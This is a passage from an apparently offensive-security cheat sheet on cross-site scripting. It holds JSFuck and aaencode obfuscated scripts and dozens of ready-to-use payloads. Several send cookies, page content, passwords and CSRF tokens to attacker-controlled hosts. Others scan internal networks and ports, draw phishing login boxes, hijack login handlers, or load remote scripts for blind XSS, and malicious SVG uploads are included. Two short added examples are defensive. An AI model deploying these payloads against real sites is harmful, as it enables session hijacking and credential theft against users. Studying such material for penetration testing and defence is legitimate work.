+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()
</script>
//aaencode
゚ω゚ノ = /`m´)ノ ~┻━┻ / /*´∇`*/["_"]
o = ゚ー゚ = _ = 3
c = ゚Θ゚ = ゚ー゚ - ゚ー゚
゚Д゚ = ゚Θ゚ = (o ^ _ ^ o) / (o ^ _ ^ o)
゚Д゚ = {
゚Θ゚: "_",
゚ω゚ノ: ((゚ω゚ノ == 3) + "_")[゚Θ゚],
゚ー゚ノ: (゚ω゚ノ + "_")[o ^ _ ^ (o - ゚Θ゚)],
゚Д゚ノ: ((゚ー゚ == 3) + "_")[゚ー゚],
}
゚Д゚[゚Θ゚] = ((゚ω゚ノ == 3) + "_")[c ^ _ ^ o]
゚Д゚["c"] = (゚Д゚ + "_")[゚ー゚ + ゚ー゚ - ゚Θ゚]
゚Д゚["o"] = (゚Д゚ + "_")[゚Θ゚]
゚o゚ =
゚Д゚["c"] +
゚Д゚["o"] +
(゚ω゚ノ + "_")[゚Θ゚] +
((゚ω゚ノ == 3) + "_")[゚ー゚] +
(゚Д゚ + "_")[゚ー゚ + ゚ー゚] +
((゚ー゚ == 3) + "_")[゚Θ゚] +
((゚ー゚ == 3) + "_")[゚ー゚ - ゚Θ゚] +
゚Д゚["c"] +
(゚Д゚ + "_")[゚ー゚ + ゚ー゚] +
゚Д゚["o"] +
((゚ー゚ == 3) + "_")[゚Θ゚]
゚Д゚["_"] = (o ^ _ ^ o)[゚o゚][゚o゚]
゚ε゚ =
((゚ー゚ == 3) + "_")[゚Θ゚] +
゚Д゚.゚Д゚ノ +
(゚Д゚ + "_")[゚ー゚ + ゚ー゚] +
((゚ー゚ == 3) + "_")[o ^ _ ^ (o - ゚Θ゚)] +
((゚ー゚ == 3) + "_")[゚Θ゚] +
(゚ω゚ノ + "_")[゚Θ゚]
゚ー゚ += ゚Θ゚
゚Д゚[゚ε゚] = "\\"
゚Д゚.゚Θ゚ノ = (゚Д゚ + ゚ー゚)[o ^ _ ^ (o - ゚Θ゚)]
o゚ー゚o = (゚ω゚ノ + "_")[c ^ _ ^ o]
゚Д゚[゚o゚] = '"'
゚Д゚["_"](
゚Д゚["_"](
゚ε゚ +
゚Д゚[゚o゚] +
゚Д゚[゚ε゚] +
゚Θ゚ +
゚ー゚ +
゚Θ゚ +
゚Д゚[゚ε゚] +
゚Θ゚ +
(゚ー゚ + ゚Θ゚) +
゚ー゚ +
゚Д゚[゚ε゚] +
゚Θ゚ +
゚ー゚ +
(゚ー゚ + ゚Θ゚) +
゚Д゚[゚ε゚] +
゚Θ゚ +
((o ^ _ ^ o) + (o ^ _ ^ o)) +
((o ^ _ ^ o) - ゚Θ゚) +
゚Д゚[゚ε゚] +
゚Θ゚ +
((o ^ _ ^ o) + (o ^ _ ^ o)) +
゚ー゚ +
゚Д゚[゚ε゚] +
(゚ー゚ + ゚Θ゚) +
(c ^ _ ^ o) +
゚Д゚[゚ε゚] +
゚ー゚ +
((o ^ _ ^ o) - ゚Θ゚) +
゚Д゚[゚ε゚] +
゚Θ゚ +
゚Θ゚ +
(c ^ _ ^ o) +
゚Д゚[゚ε゚] +
゚Θ゚ +
゚ー゚ +
(゚ー゚ + ゚Θ゚) +
゚Д゚[゚ε゚] +
゚Θ゚ +
(゚ー゚ + ゚Θ゚) +
゚ー゚ +
゚Д゚[゚ε゚] +
゚Θ゚ +
(゚ー゚ + ゚Θ゚) +
゚ー゚ +
゚Д゚[゚ε゚] +
゚Θ゚ +
(゚ー゚ + ゚Θ゚) +
(゚ー゚ + (o ^ _ ^ o)) +
゚Д゚[゚ε゚] +
(゚ー゚ + ゚Θ゚) +
゚ー゚ +
゚Д゚[゚ε゚] +
゚ー゚ +
(c ^ _ ^ o) +
゚Д゚[゚ε゚] +
゚Θ゚ +
゚Θ゚ +
((o ^ _ ^ o) - ゚Θ゚) +
゚Д゚[゚ε゚] +
゚Θ゚ +
゚ー゚ +
゚Θ゚ +
゚Д゚[゚ε゚] +
゚Θ゚ +
((o ^ _ ^ o) + (o ^ _ ^ o)) +
((o ^ _ ^ o) + (o ^ _ ^ o)) +
゚Д゚[゚ε゚] +
゚Θ゚ +
゚ー゚ +
゚Θ゚ +
゚Д゚[゚ε゚] +
゚Θ゚ +
((o ^ _ ^ o) - ゚Θ゚) +
(o ^ _ ^ o) +
゚Д゚[゚ε゚] +
゚Θ゚ +
゚ー゚ +
(o ^ _ ^ o) +
゚Д゚[゚ε゚] +
゚Θ゚ +
((o ^ _ ^ o) + (o ^ _ ^ o)) +
((o ^ _ ^ o) - ゚Θ゚) +
゚Д゚[゚ε゚] +
゚Θ゚ +
(゚ー゚ + ゚Θ゚) +
゚Θ゚ +
゚Д゚[゚ε゚] +
゚Θ゚ +
((o ^ _ ^ o) + (o ^ _ ^ o)) +
(c ^ _ ^ o) +
゚Д゚[゚ε゚] +
゚Θ゚ +
((o ^ _ ^ o) + (o ^ _ ^ o)) +
゚ー゚ +
゚Д゚[゚ε゚] +
゚ー゚ +
((o ^ _ ^ o) - ゚Θ゚) +
゚Д゚[゚ε゚] +
(゚ー゚ + ゚Θ゚) +
゚Θ゚ +
゚Д゚[゚o゚]
)(゚Θ゚)
)("_")
// It's also possible to execute JS code only with the chars: []`+!${}
Common XSS payloads
Several payloads in 1
Iframe Trap
Make the user navigate the page without exiting an iframe and steal their actions (including information sent in forms):
Retrieve Cookies
<img src=x onerror=this.src="http://<YOUR_SERVER_IP>/?c="+document.cookie>
<img src=x onerror="location.href='http://<YOUR_SERVER_IP>/?c='+ document.cookie">
<script>new Image().src="http://<IP>/?c="+encodeURI(document.cookie);</script>
<script>new Audio().src="http://<IP>/?c="+escape(document.cookie);</script>
<script>location.href = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
<script>location = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
<script>document.location = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
<script>document.location.href = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
<script>document.write('<img src="http://<YOUR_SERVER_IP>?c='+document.cookie+'" />')</script>
<script>window.location.assign('http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie)</script>
<script>window['location']['assign']('http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie)</script>
<script>window['location']['href']='http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
<script>document.location=["http://<YOUR_SERVER_IP>?c",document.cookie].join()</script>
<script>var i=new Image();i.src="http://<YOUR_SERVER_IP>/?c="+document.cookie</script>
<script>window.location="https://<SERVER_IP>/?c=".concat(document.cookie)</script>
<script>var xhttp=new XMLHttpRequest();xhttp.open("GET", "http://<SERVER_IP>/?c="%2Bdocument.cookie, true);xhttp.send();</script>
<script>eval(atob('ZG9jdW1lbnQud3JpdGUoIjxpbWcgc3JjPSdodHRwczovLzxTRVJWRVJfSVA+P2M9IisgZG9jdW1lbnQuY29va2llICsiJyAvPiIp'));</script>
<script>fetch('https://YOUR-SUBDOMAIN-HERE.burpcollaborator.net', {method: 'POST', mode: 'no-cors', body:document.cookie});</script>
<script>navigator.sendBeacon('https://ssrftest.com/x/AAAAA',document.cookie)</script>
tip
You won't be able to access the cookies from JavaScript if the HttpOnly flag is set on the cookie. But here you have some ways to bypass this protection if you are lucky enough.
Steal Page Content
var url = "http://10.10.10.25:8000/vac/a1fbf2d1-7c3f-48d2-b0c3-a205e54e09e8"
var attacker = "http://10.10.14.8/exfil"
var xhr = new XMLHttpRequest()
xhr.onreadystatechange = function () {
if (xhr.readyState == XMLHttpRequest.DONE) {
fetch(attacker + "?" + encodeURI(btoa(xhr.responseText)))
}
}
xhr.open("GET", url, true)
xhr.send(null)
Find internal IP addresses
<script>
var q = []
var collaboratorURL =
"http://5ntrut4mpce548i2yppn9jk1fsli97.burpcollaborator.net"
var wait = 2000
var n_threads = 51
// Prepare the fetchUrl functions to access all the possible
for (i = 1; i <= 255; i++) {
q.push(
(function (url) {
return function () {
fetchUrl(url, wait)
}
})("http://192.168.0." + i + ":8080")
)
}
// Launch n_threads threads that are going to be calling fetchUrl until there is no more functions in q
for (i = 1; i <= n_threads; i++) {
if (q.length) q.shift()()
}
function fetchUrl(url, wait) {
console.log(url)
var controller = new AbortController(),
signal = controller.signal
fetch(url, { signal })
.then((r) =>
r.text().then((text) => {
location =
collaboratorURL +
"?ip=" +
url.replace(/^http:\/\//, "") +
"&code=" +
encodeURIComponent(text) +
"&" +
Date.now()
})
)
.catch((e) => {
if (!String(e).includes("The user aborted a request") && q.length) {
q.shift()()
}
})
setTimeout((x) => {
controller.abort()
if (q.length) {
q.shift()()
}
}, wait)
}
</script>
Port Scanner (fetch)
const checkPort = (port) => {
  // Template literals restored; the backticks were lost in extraction.
  fetch(`http://localhost:${port}`, { mode: "no-cors" }).then(() => {
    let img = document.createElement("img");
    img.src = `http://attacker.com/ping?port=${port}`;
  });
};
for (let i = 0; i < 1000; i++) {
  checkPort(i);
}
Port Scanner (websockets)
var ports = [80, 443, 445, 554, 3306, 3690, 1234];
for(var i=0; i<ports.length; i++) {
var s = new WebSocket("wss://192.168.1.1:" + ports[i]);
s.start = performance.now();
s.port = ports[i];
s.onerror = function() {
console.log("Port " + this.port + ": " + (performance.now() -this.start) + " ms");
};
s.onopen = function() {
console.log("Port " + this.port+ ": " + (performance.now() -this.start) + " ms");
};
}
Short times indicate a responding port. Long times indicate no response.
Check the list of banned ports in Chrome here and in Firefox here.
Box to ask for credentials
<style>::placeholder { color:white; }</style><script>document.write("<div style='position:absolute;top:100px;left:250px;width:400px;background-color:white;height:230px;padding:15px;border-radius:10px;color:black'><form action='https://example.com/'><p>Your sesion has timed out, please login again:</p><input style='width:100%;' type='text' placeholder='Username' /><input style='width: 100%' type='password' placeholder='Password'/><input type='submit' value='Login'></form><p><i>This login box is presented using XSS as a proof-of-concept</i></p></div>")</script>
Capture auto-fill passwords
<b>Username:</b><br>
<input name=username id=username>
<b>Password:</b><br>
<input type=password name=password onchange="if(this.value.length)fetch('https://YOUR-SUBDOMAIN-HERE.burpcollaborator.net',{
method:'POST',
mode: 'no-cors',
body:username.value+':'+this.value
});">
When any data is introduced in the password field, the username and password are sent to the attacker's server; even if the client selects a saved password and doesn't write anything, the credentials will be exfiltrated.
Hijack form handlers to exfiltrate credentials (const shadowing)
If a critical handler (e.g., function DoLogin(){...}) is declared later in the page, and your payload runs earlier (e.g., via an inline JS-in-JS sink), define a const with the same name first to pre-empt and lock the handler. Function declarations that come later cannot rebind a const name, leaving your hook in control:
const DoLogin = () => {
const pwd = Trim(FormInput.InputPassword.value);
const user = Trim(FormInput.InputUtente.value);
fetch('https://attacker.example/?u='+encodeURIComponent(user)+'&p='+encodeURIComponent(pwd));
};
Notes
- This depends on execution order: your injection must run before the legitimate declaration.
- If your payload is wrapped inside eval(...), const/let bindings will not become globals. Use the dynamic <script> injection technique from the section "Deliverable payloads with eval(atob()) and scope nuances" to ensure a real, global, non-rebindable binding.
- When keyword filters block code, combine with Unicode-escaped identifiers or delivery via eval(atob('...')), as shown above.
Keylogger
Just searching on github I found a few different ones:
- https://github.com/JohnHoder/Javascript-Keylogger
- https://github.com/rajeshmajumdar/keylogger
- https://github.com/hakanonymos/JavascriptKeylogger
- You can also use metasploit http_javascript_keylogger
Stealing CSRF tokens
<script>
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get','/email',true);
req.send();
function handleResponse() {
var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
var changeReq = new XMLHttpRequest();
changeReq.open('post', '/email/change-email', true);
changeReq.send('csrf='+token+'&email=test@test.com')
};
</script>
Stealing PostMessage messages
<img src="https://attacker.com/?" id=message>
<script>
window.onmessage = function(e){
document.getElementById("message").src += "&"+e.data;
}
</script>
Abusing Service Workers
Accessing Shadow DOM
Polyglots
https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/xss_polyglots.txt
Blind XSS payloads
You can also use: https://xsshunter.com/
"><img src='//domain/xss'>
"><script src="//domain/xss.js"></script>
><a href="javascript:eval('d=document; _ = d.createElement(\'script\');_.src=\'//domain\';d.body.appendChild(_)')">Click Me For An Awesome Time</a>
<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//0mnb1tlfl5x4u55yfb57dmwsajgd42.burpcollaborator.net/scriptb");a.send();</script>
<!-- html5sec - Self-executing focus event via autofocus: -->
"><input onfocus="eval('d=document; _ = d.createElement(\'script\');_.src=\'\/\/domain/m\';d.body.appendChild(_)')" autofocus>
<!-- html5sec - JavaScript execution via iframe and onload -->
"><iframe onload="eval('d=document; _=d.createElement(\'script\');_.src=\'\/\/domain/m\';d.body.appendChild(_)')">
<!-- html5sec - SVG tags allow code to be executed with onload without any other elements. -->
"><svg onload="javascript:eval('d=document; _ = d.createElement(\'script\');_.src=\'//domain\';d.body.appendChild(_)')" xmlns="http://www.w3.org/2000/svg"></svg>
<!-- html5sec - allow error handlers in <SOURCE> tags if encapsulated by a <VIDEO> tag. The same works for <AUDIO> tags -->
"><video><source onerror="eval('d=document; _ = d.createElement(\'script\');_.src=\'//domain\';d.body.appendChild(_)')">
<!-- html5sec - eventhandler - element fires an "onpageshow" event without user interaction on all modern browsers. This can be abused to bypass blacklists as the event is not very well known. -->
"><body onpageshow="eval('d=document; _ = d.createElement(\'script\');_.src=\'//domain\';d.body.appendChild(_)')">
<!-- xsshunter.com - Sites that use JQuery -->
<script>$.getScript("//domain")</script>
<!-- xsshunter.com - When <script> is filtered -->
"><img src=x id=payload== onerror=eval(atob(this.id))>
<!-- xsshunter.com - Bypassing poorly designed systems with autofocus -->
"><input onfocus=eval(atob(this.id)) id=payload== autofocus>
<!-- noscript trick -->
<noscript><p title="</noscript><img src=x onerror=alert(1)>">
<!-- whitelisted CDNs in CSP -->
"><script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.6.1/angular.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.6.1/angular.min.js"></script>
<!-- ... add more CDNs, you'll get WARNING: Tried to load angular more than once if multiple load. but that does not matter you'll get a HTTP interaction/exfiltration :-]... -->
<div ng-app ng-csp><textarea autofocus ng-focus="d=$event.view.document;d.location.hash.match('x1') ? '' : d.location='//localhost/mH/'"></textarea></div>
<!-- Payloads from https://www.intigriti.com/researchers/blog/hacking-tools/hunting-for-blind-cross-site-scripting-xss-vulnerabilities-a-complete-guide -->
<!-- Image tag -->
'"><img src="x" onerror="eval(atob(this.id))" id="Y29uc3QgeD1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTt4LnNyYz0ne1NFUlZFUn0vc2NyaXB0LmpzJztkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKHgpOw==">
<!-- Input tag with autofocus -->
'"><input autofocus onfocus="eval(atob(this.id))" id="Y29uc3QgeD1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTt4LnNyYz0ne1NFUlZFUn0vc2NyaXB0LmpzJztkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKHgpOw==">
<!-- In case jQuery is loaded, we can make use of the getScript method -->
'"><script>$.getScript("{SERVER}/script.js")</script>
<!-- Make use of the JavaScript protocol (applicable in cases where your input lands into the "href" attribute or a specific DOM sink) -->
javascript:eval(atob("Y29uc3QgeD1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTt4LnNyYz0ne1NFUlZFUn0vc2NyaXB0LmpzJztkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKHgpOw=="))
<!-- Render an iframe to validate your injection point and receive a callback -->
'"><iframe src="{SERVER}"></iframe>
<!-- Bypass certain Content Security Policy (CSP) restrictions with a base tag -->
<base href="{SERVER}" />
<!-- Make use of the meta-tag to initiate a redirect -->
<meta http-equiv="refresh" content="0; url={SERVER}" />
<!-- In case your target makes use of AngularJS -->
{{constructor.constructor("import('{SERVER}/script.js')")()}}
Regex - Access Hidden Content
From this writeup it's possible to learn that even if some values disappear from JS, it's still possible to find them in JS attributes of different objects. For example, the input of a REGEX can still be found after the value of the regex input was removed:
// Do regex with flag
flag = "CTF{FLAG}"
re = /./g
re.test(flag)
// Remove flag value, nobody will be able to get it, right?
flag = ""
// Access previous regex input
console.log(RegExp.input)
console.log(RegExp.rightContext)
console.log(
document.all["0"]["ownerDocument"]["defaultView"]["RegExp"]["rightContext"]
)
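What the snippet above relies on is the legacy (Annex B) static properties of the `RegExp` constructor, which V8 and SpiderMonkey still maintain: every successful match overwrites `RegExp.input`, `RegExp.lastMatch`, `RegExp.rightContext` and friends with the subject string, so a secret that was merely validated by a regex survives the variable being cleared. The following added example (not from the page or the writeup it cites) reproduces the leak with a constructed secret and shows the cheap mitigation: run a throwaway match once the secret has been handled so the statics no longer reference it. Function names are assumptions.

```javascript
// Added example (not from the page): legacy RegExp statics retain the last
// matched subject string; overwrite them after handling a secret.

// Typical application code: validate a secret-looking value, then drop it.
function validateSecret(secret) {
  // A successful match records `secret` in the legacy statics as a side effect.
  return /CTF\{/.test(secret);
}

// What a script that runs later in the same realm can still read.
function leakLastRegexInput() {
  return {
    input: RegExp.input,               // last subject string (alias RegExp.$_)
    rightContext: RegExp.rightContext, // text after the last match (alias RegExp["$'"])
  };
}

// Mitigation: any successful match against a harmless string replaces the
// retained subject. Do this right after regex-handling sensitive data in a
// realm that may later execute untrusted code.
function scrubRegExpStatics() {
  /x/.test("x");
}

// Demo with a constructed secret: clearing the variable is not enough.
function demo() {
  let flag = "CTF{FLAG}";
  validateSecret(flag);
  flag = "";                         // variable gone, statics still hold it
  const before = leakLastRegexInput();
  scrubRegExpStatics();
  const after = leakLastRegexInput();
  return { before, after };
}

console.log(demo());
// before.input is "CTF{FLAG}" and before.rightContext is "FLAG}";
// after.input is "x".
```

The stronger fix is structural: do not validate secrets with regexes in a realm (page, worker, sandboxed iframe) that also runs attacker-influenced code, since the statics are global to the realm and cannot be disabled from script.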
Brute-Force List
Auto_Wordlists/wordlists/xss.txt at main · carlospolop/Auto_Wordlists · GitHub
XSS abusing other vulnerabilities
XSS in Markdown
Can you inject Markdown code that will be rendered? Maybe you can get XSS! Check:
XSS to SSRF
Got XSS on a site that uses caching? Try upgrading that to SSRF through Edge Side Include Injection with this payload:
<esi:include src="http://yoursite.com/capture" />
Use it to bypass cookie restrictions, XSS filters and much more!
More information about this technique here: XSLT.
XSS in dynamically created PDFs
If a web page is creating a PDF using user-controlled input, you can try to trick the bot that is creating the PDF into executing arbitrary JS code.
So, if the PDF creator bot finds some kind of HTML tags, it is going to interpret them, and you can abuse this behaviour to cause a Server XSS.
If you cannot inject HTML tags it could be worth trying to inject PDF data:
XSS in Amp4Email
AMP, aimed at accelerating web page performance on mobile devices, incorporates HTML tags supplemented by JavaScript to ensure functionality with an emphasis on speed and security. It supports a range of components for various features, accessible via AMP components.
The AMP for Email format extends specific AMP components to emails, enabling recipients to interact with content directly within their emails.
Example writeup XSS in Amp4Email in Gmail.
XSS uploading files (svg)
Upload as an image a file like the following (from http://ghostlulz.com/xss-svg/):
Content-Type: multipart/form-data; boundary=---------------------------232181429808
Content-Length: 574
-----------------------------232181429808
Content-Disposition: form-data; name="img"; filename="img.svg"
Content-Type: image/svg+xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert(1);
</script>
</svg>
-----------------------------232181429808--
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<script type="text/javascript">alert("XSS")</script>
</svg>
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert("XSS");
</script>
</svg>
<svg width="500" height="500"
xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<circle cx="50" cy="50" r="45" fill="green"
id="foo"/>
<foreignObject width="500" height="500">
<iframe xmlns="http://www.w3.org/1999/xhtml" src="data:text/html,<body><script>document.body.style.background="red"</script>hi</body>" width="400" height="250"/>
<iframe xmlns="http://www.w3.org/1999/xhtml" src="javascript:document.write('hi');" width="400" height="250"/>
</foreignObject>
</svg>
<svg><use href="//portswigger-labs.net/use_element/upload.php#x" /></svg>
<svg><use href="data:image/svg+xml,<svg id='x' xmlns='http://www.w3.org/2000/svg' ><image href='1' onerror='alert(1)' /></svg>#x" />
Find more SVG payloads in https://github.com/allanlw/svg-cheatsheet
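On the defensive side, an added example (not from the page or any of the linked sources): a conservative upload gate that rejects the constructs used by the SVG payloads above. It assumes the upload handler has already restricted the file to image/svg+xml, and it scans at token level rather than building a DOM, so it deliberately over-rejects; `svgFindings` and `isSafeSvg` are hypothetical helper names.

```javascript
// Added example, not from the page: a conservative gate for SVG uploads that
// rejects the executable constructs used by the payloads above. It scans at
// token level (no DOM), so it deliberately errs toward rejecting.
const TAG_RE = /<\s*([a-zA-Z][\w:.-]*)([^>]*)>/g;
const ATTR_RE = /([^\s=/<>"']+)\s*=\s*("[^"]*"|'[^']*'|[^\s>]+)/g;
const BANNED_TAGS = new Set([
  "script", "foreignobject", "iframe", "object", "embed",
  "use", "image", "animate", "set", "handler",
]);
// Reference attributes may only point at a fragment of the same document.
const REF_ATTRS = new Set(["href", "xlink:href", "src"]);

// Returns the list of reasons the file should be rejected (empty = accept).
function svgFindings(svg) {
  const findings = [];
  TAG_RE.lastIndex = 0;
  let m;
  while ((m = TAG_RE.exec(svg)) !== null) {
    const tag = m[1].toLowerCase();
    if (BANNED_TAGS.has(tag)) findings.push(`tag <${tag}>`);
    ATTR_RE.lastIndex = 0;
    let a;
    while ((a = ATTR_RE.exec(m[2])) !== null) {
      const name = a[1].toLowerCase();
      const value = a[2].replace(/^["']|["']$/g, "").trim().toLowerCase();
      if (name.startsWith("on")) findings.push(`event handler ${name}`);
      if (REF_ATTRS.has(name) && !value.startsWith("#")) {
        findings.push(`${name} -> ${value.slice(0, 40)}`);
      }
    }
  }
  return findings;
}

function isSafeSvg(svg) {
  return svgFindings(svg).length === 0;
}

// Constructed samples: a benign icon and two payload shapes from the list above.
const BENIGN_SVG = '<svg xmlns="http://www.w3.org/2000/svg"><rect width="10" height="10" fill="#00f"/></svg>';
const SCRIPT_SVG = '<svg xmlns="http://www.w3.org/2000/svg"><script type="text/javascript">alert("XSS")</script></svg>';
const USE_SVG = '<svg><use href="//portswigger-labs.net/use_element/upload.php#x" /></svg>';
```

Because a data: or javascript: URI in an attribute can itself contain `>`, the tag regex cuts such an attribute short, but the nested `<script>` or `<image onerror>` is then seen as its own tag and still flagged.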
Misc JS Tricks & Relevant Info
XSS resources
- https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20injection
- http://www.xss-payloads.com
- https://github.com/Pgaijin66/XSS-Payloads/blob/master/payload.txt
- https://github.com/materaj/xss-list
- https://github.com/ismailtasdelen/xss-payload-list
- https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec
- https://netsec.expert/2020/02/01/xss-in-2020.html
- https://www.intigriti.com/researchers/blog/hacking-tools/hunting-for-blind-cross-site-scripting-xss-vulnerabilities-a-complete-guide
References